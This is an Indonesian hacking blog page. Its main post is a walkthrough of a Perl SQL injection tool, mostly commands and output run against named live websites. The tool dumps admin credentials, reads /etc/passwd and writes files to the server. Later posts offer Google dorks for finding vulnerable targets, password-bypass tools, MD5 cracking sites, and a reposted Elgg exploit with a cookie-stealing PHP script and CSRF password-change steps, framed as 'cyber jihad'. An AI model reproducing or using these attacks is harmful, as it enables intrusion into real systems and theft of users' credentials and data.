Simple SQL Dumper V.5.1

[o] attention
USE THIS TOOL FOR EDUCATION PURPOSE ONLY.
WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL.
USE IT AT YOUR OWN RISK!!
[o] what is SSDp?
SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.
[o] download SSDp v5.1
http://okedeh.co.tv/ssdp51.tar.gz
http://pacenoge.org/tool/ssdp51.tar.gz
[o] function
- SQL Injection
- Operation System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column
[o] command and option
[root@evilc0de noge]# perl ssdp.pl -h
|—————————————————————————–|
| Usage: perl ssdp.pl [options] |
| |
| -u [SQLi URL] target with id parameter or sqli url with c0li string |
| -e [sqli end tag] sql injection end tag (default: “–”) |
| -d [database name] this option should not be used (default: @@database) |
| -t [table name] table_name |
| -c [columns name] column_name (example: id,user,pass,email) |
| -s [space code] SPACE code: +,/**/,%20 (default: “+”) |
| -f [max field] max field to get magic number (default: 123) |
| -start [num] row number to begin dumping data |
| -stop [num] row number to stop dumping |
| -where [query] your special dumping query |
| |
| -info Get MySQL Information [MySQL v4+] |
| -dbase Concat Databases [MySQL v5+] |
| -table Concat Tables [MySQL v5+] |
| -column Concat Columns [MySQL v5+] |
| -tabcol Concat Tables with Columns [MySQL v5+] |
| -find Search Columns Name [MySQL v5+] |
| -magic Find Magic Number [MySQL v4+] |
| -dump Dump Data [MySQL v4+] |
| -brute Fuzzing Tables & Columns [MySQL v4+] |
| |
| -log [file name] file name to save ssdp data (default: ssdp.log) |
| -p [http proxy] hostname:port |
|—————————————————————————–|
[o] proof of concept
[0x01] magic number (null column).
first of all we have to find null column (magic number).
null column used for execute our SQL query.
# perl ssdp.pl -u [target URL] -magic
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] URL: http://www.460productions.com/store.php?cat=2
[+] End Tag: –
Attempting to find the magic number…
[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
[+] Field Length : 24
[+] Magic Number : 1
[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
Showing MySQL Information …
[+] Database: 460store
[+] User: i460usr@boscgi1002.eigbox.net
[+] Version: 5.0.51a-log
[+] System: redhat-linux-gnu
[+] Access to “mysql” Database: No
[+] Read File “/etc/passwd”: Yes (w00t)
[+] Create File “/tmp/c0li-430.txt”: Yes (w00t)
Done.
our magic number is 1 and it will replace with “c0li” string.
we can see the database information and operation system too.
[0x02] finding table
now we use URL that include “c0li” string on it to find table & column.
# perl ssdp.pl -u [c0li URL] -table
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Number of Tables: 18
Showing tables …
[1] aspect_ratio(2)
[2] audio_format(3)
[3] category(7)
[4] customer(200)
[5] deposit(11)
[6] discount_group(9)
[7] discount_group_price(10)
[8] order()
[9] order_item(261)
[10] order_source(5)
[11] order_status(4)
[12] order_type(2)
[13] payment_type(4)
[14] product(30)
[15] product_group(17)
[16] security(1)
[17] shopping_cart(0)
[18] user_session(68)
Done.
that is the list of all table in database()
[0x03] finding column
let’s see column from table called “security”.
# perl ssdp.pl -u [c0li URL] -t [table] -column
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Table Name: security
[+] Number of Columns: 5
Showing columns from table “security” …
[+] security(1): user_id,username,password,admin,last_login
Done.
aha! we got column called “username” and “password”.
[0x04] dumping data
now we’ll see information inside that column.. :)
# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Table Name: security
[+] Column Name: username,password
[+] Data Count: 1
Dumping Data …
[1] admin : 2ec20101734c754d
Done.
we got admin username and password hash. :D
ok i have show you how to find magic number, table, column and dump data the column using SSDp.
[0x05] search column name (-find)
now i’ll show you how to use -find option (Search Columns Name)
i’ll try to search column with keyword “address” it require -c option (column)
# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: 460store
[+] Column Name string to search: address
Searching for Columns Path …
[+] Columns Found:
[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name
Done.
found column with word “address” on table “customer”. easy right? :p
[0x06] read & create file (read only)
now let’s see Read File (read only) & Create File (read only).
why read only? coz this function design just to test if we can read file or no. to inject, we do it manually.. :(
as you can see at the first time we find magic number you’ll find this line.
[+] Read File “/etc/passwd” : Yes (w00t)
[+] Create File “/tmp/c0li-159.txt” : Yes (w00t)
it means we can read (load_file) the /etc/passwd file on a target also we can create file at /tmp directory.
to use load_file you need to convert the /etc/passwd into hexadecimal. http://pacenoge.org/encdec
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–
the result will be like this.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
let’s create some file in /tmp directory. :)
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,”Simple SQLi Dumper”,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+”/tmp/ssdp.txt”–
URL above means we write “Simple SQLi Dumper” into ssdp.txt that locate at /tmp directory.
to see if it works or no lets read /tmp/ssdp.txt using load_file function. don’t forget to convert it first.
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–
and you will see result like this.
1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
that the word we write in /tmp/ssdp.txt.
what can we do with create file vuln? we can make a php file as backdoor at the target if we know the directory path. :) )
[0x07] brute MySQL v4
guessing table & column for MySQL v4.
you can add your own table name & column name by editing file called tables.dict & columns.dict.
# perl ssdp.pl -u [c0li URL] -brute
[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sun Mar 21 19:31:42 2010
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33
[+] SQLi End Tag: –
Finding Tables & Columns …
[1] admin_user: username,password,email,adminid,adminname,phone,
Done.
found table “admin_user”
found column “username” “password” “email” “adminid” “adminname” “phone”
[0x08] conclusion
by using SSDp, it’s very easy to find SQL injection vulnerability at certain vulnerable parameter or string.
this tool also perform SQL injection test to the vulnerable website and try to dump data from MySQL database.
you can dump data from MySQL database columns and it works nicely.
you can gather secret and confidential data such as usernames, passwords, credit card numbers and etc.
but, i suggest using this tool in a right way. okey dude?? :p
[0x09] references
perl ssdp.pl -h
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
[0x10] greetz ^^
SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )
SSDp How To by NoGe ( mario[at]antisecurity[dot]org )
Vrs-hCk OoN_Boy paman zxvf angel stardustmemory
s4va xr00tb0y S3T4N pizzyroot matthews martfella

binus hacker
Readmore »

Defeating IPv6

http://www.exploit-db.com/papers/15562/
Readmore »

alat perang hack website

http://www.4shared. com/file/ 103908451/ 1db4bbe6/ SQL_Exploiter_ Pro_v210. html
http://www.4shared. com/file/ 103908789/ a487f3c0/ SQL_Injection_ Pentesting_ TooL30.html
http://www.4shared. com/file/ 71839955/ 297f0caa/ Sql-Injection. html
http://www.4shared. com/file/ 106058970/ ed8a8bbe/ Web_Hacking_ Tools.html
Readmore »

Panduan menjadi hacker

mungkin selama ini anda bertanaya-tanya, apa itu hacker, apa yang harus dilakukan untuk menjadi hacker mungkin bisa baca disini
semoga bermanfaat
Readmore »

Hack Password Windows 7, Vista, XP, Ubuntu atau Fedora

sofware utk hack password namanya kon-boot
lumayan canggih juga ni sofware filenya kecil lagi cuma 10 kb
Penggunaan Kon-Boot:
Untuk Windows, tidak ada instruksi khusus, setelah di download, buat bootable media ( dengan CD atau Floppy disk). Setelah itu, booting komputer melalui CD/Floppy tersebut, setelah tampilan seperti gambar berikut, maka otomatis akan langsung masuk windows.

Versi Windows yang telah di test :
- Windows Server 2008 Standard SP2 (v.275)
- Windows Vista Business SP0
- Windows Vista Ultimate SP1
- Windows Vista Ultimate SP0
- Windows Server 2003 Enterprise
- Windows XP
- Windows XP SP1
- Windows XP SP2
- Windows XP SP3
- Windows 7
Linux ( dan versi kernel-nya) yang telah di Test:
- Gentoo 2.6.24-gentoo-r5
- Ubuntu 2.6.24.3-debug
- Debian 2.6.18-6-6861
- Fedora 2.6.25.9-76.fc9.i6862
Download Kon-Boot: http://www.piotrbania.com/all/kon-boot/

smoga bermanfaat
Readmore »

Hacker

Download link-nya ada disini atau disini
Readmore »

video tutorial sql injection

Readmore »

Cara Hack deepfreeze 6!!!

CARA Hack deep freeze 6 dengan mudah dan tidak repot.
tested deepfreeze v 6.3 yg enterprise
klo yang deepfreeze yang wks ga bisa.
download:
http://www.ziddu.com/download/5619129/DeefHack.zip.html
cara gunainnya :
1. jalanin deefhack
2. pilih versi deepfreeze nya
3. tekan ctrl+shift+alt+f6
4. kosongkan passwordnya
5. enter dah
sumber:
http://www.linggis.tk
Readmore »

Sedikit dork google yang mungkin berguna

Apa itu dork??
Dork adalah kata kunci yang ditulis dalam search engine. Biasanya google dan yang jabarkan ini hanya untuk google….
terus menfaat dari dork??
Untuk memudahkan pencarian victim (korban) dalam melakukan attacking (serangan) terhadap server/sistem yang memiliki bugs (permasalahan keamanan)
Setelah itu??
banyak hal yang kita bisa lakukan terhadap korban yang telah ditemukan..
Mulai dari pemasangan bot,uploading files,backdooring hingga defacing…
dork dari beberapa bugs seperti sql injection,remote file inclusion (RFI),Local file inclusion (LFI)...
Bugs yang lain??
belum ana posting smile ,, insya Allah nanti akan menyusul…
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
/classified_right.php?language_dir=
/sources/functions.php?CONFIG[main_path]=
/sources/template.php?CONFIG[main_path]=
/embed/day.php?path=
/includes/dbal.php?eqdkp_root_path=
/sources/join.php?FORM[url]=owned&CONFIG;[captcha]=1&CONFIG;[path]=
/includes/kb_constants.php?module_root_path=
/mcf.php?content=
/components/com_facileforms/facileforms.frame.php?ff_compath=
skins/advanced/advanced1.php?pluginpath[0]=
/zipndownload.php?PP_PATH=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/main.php?sayfa=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/addpost_newpoll.php?addpoll=preview&thispath;=
/header.php?abspath=
components/com_performs/performs.php?mosConfig_absolute_path=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
impex/ImpExData.php?systempath=
/modules/vwar/admin/admin.php?vwar_root=
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/tools/send_reminders.php?includedir= allinurl:day.php?date=
/skin/zero_vote/error.php?dir=
/modules/TotalCalendar/about.php?inc_dir=
/login.php?dir=
/tags.php?BBCodeFile=
index.php?pageurl=
/templates/headline_temp.php?nst_inc=
index.php?var=
index.php?pagina=
index.php?go=
index.php?site=
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
index.php?pagina=
index.php?id=
index1.php?=
index.php?site=
main.php?id=
content.php?page=
admin.php?page=
lib/gore.php?libpath=
SQuery/lib/gore.php?libpath=
index2.php?p=
index1.php?go= 
news_detail.php?file=
old_reports.php?file=
index.php?x=
index.php?nic=
homepage.php?sel=
index.php?sel=
main.php?x=
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
index2.php?x=
main.php?pagina=
test.php?page=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
akocomments.php?mosConfig_absolute_path=
index.php?page=
index.php?oldal=
index.php?lang=
index.php?pag=
index.php?incl=
avatar.php?page=
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS;=&mosConfig;_absolute_path=
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS;=&mosConfig;_absolute_path=
index.php?p=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
index.php?x=
index.php?mode=
index.php?stranica=
index.php?sub=
index.php?id=
index.php?t=
index.php?r=
index.php?menu=
index.php?pag=
solpot.html?body= 
port.php?content=
index0.php?show=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/tools/send_reminders.php?includedir=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/tags.php?BBCodeFile=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
content.php?page=
index.php?topic=
index.php?u=
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
modules/My_eGallery/index.php?basepath=
/modules/vwar/admin/admin.php?vwar_root=
index.php?loc=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/tags.php?BBCodeFile=
myevent.php?myevent_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
myevent.php?myevent_path=
includes/functions.php?phpbb_root_path=
m2f/m2f_phpbb204.php?m2f_root_path=
/tags.php?BBCodeFile=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
show.php?path=
show.php?path=
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
index.php?template=
search.php?cutepath=
show_news.php?cutepath=
page.php?doc=
administrator/components/com_webring/admin.webring.docs.php?component_dir=
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= 
help.php?css_path=
components/com_galleria/galleria.html.php?mosConfig_absolute_path=
big.php?pathtotemplate=
includes/search.php?GlobalSettings[templatesDirectory]=
interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=
/functions.php?include_path=
modules/My_eGallery/index.php?basepath=
components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob;[rootDir]= 
/class.mysql.php?path_to_bt_dir= 
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/squirrelcart/cart_content.php?cart_isp_root=
index2.php?to=
index.php?load=
home.php?pagina=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/vwar/admin/admin.php?vwar_root=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/4nAlbum/public/displayCategory.php?basepath=
/include/write.php?dir=
db.php?path_local=
index.php?site=
index.php?url=
index.php?p=
index.php?openfile=
index.php?file=
index.php?go=
index.php?content=
index.php?side=
index.php?kobr=
index.php?doc=
index.php?l=
index.php?a=
index.php?principal=
index.php?show=
index.php?opcao=
index.php?conteudo=
index.php?meio=
index.php?inc=
index.php?c=
index.php?rage=
index.php?arquivo=
index.php?nic=
index.php?x=
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=
index.php?place=
index.php?show=
index.php?dsp=
index.php?dept=
index.php?lg=
index.php?inhalt=
index.php?ort=
index.php?pilih=
principal.php?conteudo=
main.php?site=
template.php?pagina=
contenido.php?sec=
index_principal.php?pagina=
template.php?name=
forum.php?act=
home.php?action=
home.php?pagina=
noticias.php?arq=
main.php?x=
main.php?page=
default.php?page=
index.php?cont=
index.php?configFile=
index.php?meio.php=
index.php?include=
index.php?open=
index.php?visualizar=
index.php?x=
index.php?pag=
index.php?cat=
index.php?action=
index.php?do=
index2.php?x=
index2.php?content=
main.php?pagina=
index.phpmain.php?x=
index.php?link=
index.php?canal=
index.php?screen=
index.php?langc=
services.php?page=
htmltonuke.php?filnavn=
ihm.php?p=
default.php?page=
folder.php?id=
index.php?Load=
index.php?Language=
hall.php?file=
hall.php?page=
template.php?goto=
video.php?content=
pages.php?page=
print.php?page=
show.php?page=
view.php?page=
media.php?page=
index1.php?choix=
index1.php?menu=
index.php?ort=
index2.php?showpage=
index2.php?ascii_seite=
index2.php?DoAction=
index2.php?ID=
index2.php?url_page=
index1.php?dat=
index1.php?site=
index0.php?show=
home.php?content=
port.php?content=
main.php?link=
home.php?x=
index1.php?x=
index2.php?x=
main.php?x=
homepage.php?sel=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/agendax/addevent.inc.php?agendax_path=
/include/main.php?config[search_disp]=true&include;_dir=
/contrib/yabbse/poc.php?poc_root_path=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=
/photoalb/lib/static/header.php?set_menu=
/squito/photolist.inc.php?photoroot=
/bz/squito/photolist.inc.php?photoroot=
/ppa/inc/functions.inc.php?config[ppa_root_path]=
/spid/lang/lang.php?lang_path=
/classes.php?LOCAL_PATH=
al_initialize.php?alpath=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS;=&mosConfig;_absolute_path=
/extensions/moblog/moblog_lib.php?basedir=
/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=
components/com_performs/performs.php?mosConfig_absolute_path=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
Readmore »

Pengenalan Jaringan

bisa didownload disini
Readmore »

Alat-alat Perang hacking

Readmore »

Hide iP 2.1.1

buat ngehidenn iP kita
sedikit berbagi…
http://rapidshare.com/files/73444710/HIP_By_Demonik_Warex-Z.com.rar
passna:www.warex-z.com
moga bermanfaat
Readmore »

Mempercepat koneksi,

pertama” yang di butuhkan
NOTEPAD

trus copy kan script di bawah ini

========================================================================
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
“TCPWindowSize”=dword:000faf00
“GlobalMaxTcpWindowSize”=dword:000faf00
“EnablePMTUDiscovery”=dword:00000001
“SackOpts”=dword:00000001
“DefaultTTL”=dword:00000200
“TcpMaxDupAcks”=dword:00000002
“Tcp1323Opts”=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
“MaxConnectionsPerServer”=dword:00000019
“MaxConnectionsPer1_0Server”=dword:00000019
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
“MaxConnectionsPerServer”=dword:00000019
“MaxConnectionsPer1_0Server”=dword:00000019
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
“MaxNegativeCacheTtl”=dword:00000000
“NetFailureCacheTime”=dword:00000000
“NegativeSOACacheTime”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Psched]
“NonBestEffortLimit”=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider]
“LocalPriority”=dword:00000006
“HostsPriority”=dword:00000007
“DnsPriority”=dword:00000008
“NetbtPriority”=dword:00000009
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{A360487D-4138-479C-A0F6-D03C8EC28926}]
“MTU”=dword:000005dc
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters]
“SizReqBuf”=dword:00004000
=============================================================================

==(sama dengaan nya ga usah di copy)
script di dalem sama dengan nya saja

trus tinggal di save
ingat type extensinya .REG

misalkan :  speed.reg
ato apalah, yg penting (*.reg)
trus tinggal kita jalankan (KLICK)
yg kita save tadi

selamat mencoba
Readmore »

situs buat recovery MD5 hash

buat yg berhasil hack pakai sql injection & dapat password tapi formatnya acak (hash MD5)nih ada situs yg bisa membantu recovery tuh password biar bisa dibaca manusia.
nih situsnya
http://passcracking.com/
 http://tools.kerinci.net/?x=md5
http://www.milw0rm.com/cracker/
n masih banyak lagi…hampir rata” web hacking besar menyediakan decript md5…
lagian php code untuk decript nya udah banyak beredar…terus software offline juga banyak..
Readmore »

How to exploit

hal yang pertama dilakukan oleh seorang  cyber sebelum melakukan attacking adalah proses scanning bugs atau exploit…
Banyak cara bagaimana seorang mujahid cyber melakukan exploit…
dari mulai dengan proses exploit sendri,scanning web sendiri atau menggunakan exploit orang lain…
Target pembahasan kita adalah “bagaimana melakukan exploit dengan memanfaatkan bugs yang sudah ada???”
hehehe…
banyak cara menuju Madinah tapi cuma 1 cara menuju jannah…
ok,,,akhi cyber jihad starts now…
Here we go!!!!
hehehe…
kita bisa dapatkan exploit-exploit dari web security yang menyediakan jasa exploit bagi para hackers…
http://www.milw0rm.com
http://www.packetstormsecurity.org
http://www.securityfocus.com
dan masih banyak lagi..
sekarang kita akan coba dengan menggunakan http://www.milw0rm.com sebagai bahan dasar…
kenapa harus milw0rm??
karena menurut ana selain memiliki interface yang user friendly (menurut ana) terus kita gak terlalu susah dalam melakukan exploit dari sini..terlebih untuk newbie seperti ana..heheheh
selain itu milw0rm sempat terancam inactive,,karena sang admin str0ke sempat ingin menutup server dari milw0rm…udah tobat katanya..heheheh…
tapi sekarang udah nyala lagi…
hal ini memungkin untuk munculnya para cyber mujahid….Insya Allah
ok..kita mulai…
Bismillah..
1.Buka http://www.milw0rm.com ...setelah di buka akan terlihat beberapa kategori…terget kita untuk kali ini adalah web apps
2.target pencarian bugs kita sekarang ana bukan mau bahas sqli,rfi,xss,atau lfi tapi adalah CSRF
3.menuju ke menu search…ketik CSRF,,untuk keyword search bisa di ubah sesuai dengan keinginan antum dan pencarian bugs apa yang ingin antum cari contoh…..joomla atau sqli atau rfi atau admin remote…sesuai dengan keinginan pencarian bugs…tapi target kita sekarang adalah csrf
kok harus csrf??
bukan harus sih…tapi lagi pengen aja….kita terlalu sering dengar yang namanya sqli,rfi atau xss…csrf udah hampir terlupakan…huhuhuhu..
padahal ini bugs paling asik lho….sebenarnya masih banyak lagi bugs yang ada di dunia cyber ini yang belum orang begitu tau..mulai csrf,rfd,xsrf dll
4.karena ana lagi mood dengan csrf…maka kita ketikkan csrf….setelah di ketikkan ada kelihatan list bugs yang bisa digunakan….
5.ana ambil contoh…
http://www.milw0rm.com/exploits/8993

###################################################################################
[+] CMS Elgg
<1.00 (XSS;CSRF;Cambia Password)Multiple Remote Vulnerabilities
[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
[+] Vendor:http://elgg.org/
[+] Greetings: Project MEMI-Bolivia, OpTix, RTM security Group
http://zonartm.og
###################################################################################
 
Change Password Remotely:
+++++++++++++++++++++++++
1) You Must Register In ThE site.
2) Login
3) Create a new topic and then edit
  http://www.sitiosocial.com/_templates/
   
Edit the new topic (Template) have the option to insert HTML, JavaScript
##################################################################################
Exploit& HTML Injection
###Cookie Grabber####
[+] Discovered By ThE Lorddemon
[+] Vendor:http://elgg.org/
##################################################################################
PoC

Script to store cookies
$cookie = $_GET[‘cookie’];
$log = fopen(“log.txt”, “a”);
fwrite($log, $cookie .”\n”);
fclose($log);
?>
uploading to a host.Save as cookie.php
[+]Exploit:
  ———-
1) Register in The SIte
2) add to the Template
[removed][removed]
The victim would be anyone who comes to your blog.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###Change Pasword####
[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
[+] http://zonartm.org
[+] Vendor:http://elgg.org/
#######################################################################################################
1) Register in The SIte
2) add to the Template









  <------ Eye with this

password”> 
<------ Eye with this









id_victima”>         
<---------Eye with this

id_victima”>   
<---------Eye with this


[/color]
It is better to send all the form inside a Div tag to pass unnoticed

The victim would be the user with the id.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###You Be More Popular, or remove the victim to Friends####
[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
[+]
http://zonartm.org
[+] Vendor:http://elgg.org/
#################################################################################################################
1) Register in The SIte
2) Add to the Template
http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=friend&friend;_id=[tu id]
viewing parameters from the viewpoint of the attacker.
Friends_name=is the user name who made you want to be your friend. (may be empty)
Action= friend or unfriend.
Friend_id=User ID. who is performing the action
 
You can also remove it with friends cuanquier user.
http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=Unfriend&friend;_id=[id_victima]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2009-06-22]
kebetulan dari contoh exploit yang ana contohin memiliki multi bugs xss dan csrf….
tapi fokus kita adalah csrf…
ikutin petunujuk…
register dan add to template coding yang di html nya….
untuk yang warna biru bisa di ganti dengan password yang akan di ubah dan id victim sasaran..
terus simpan code html di notepad dan simpan dengan ekstensi .html
terus double klik file html nya…
apa yang terjadi???password victim telah berhasil kita ubah!!!!
untuk exploit xss…
kita lakukan dengan yang sama…
yang intinya adalah iqra’ (baca)...
heheheh…
Nb.
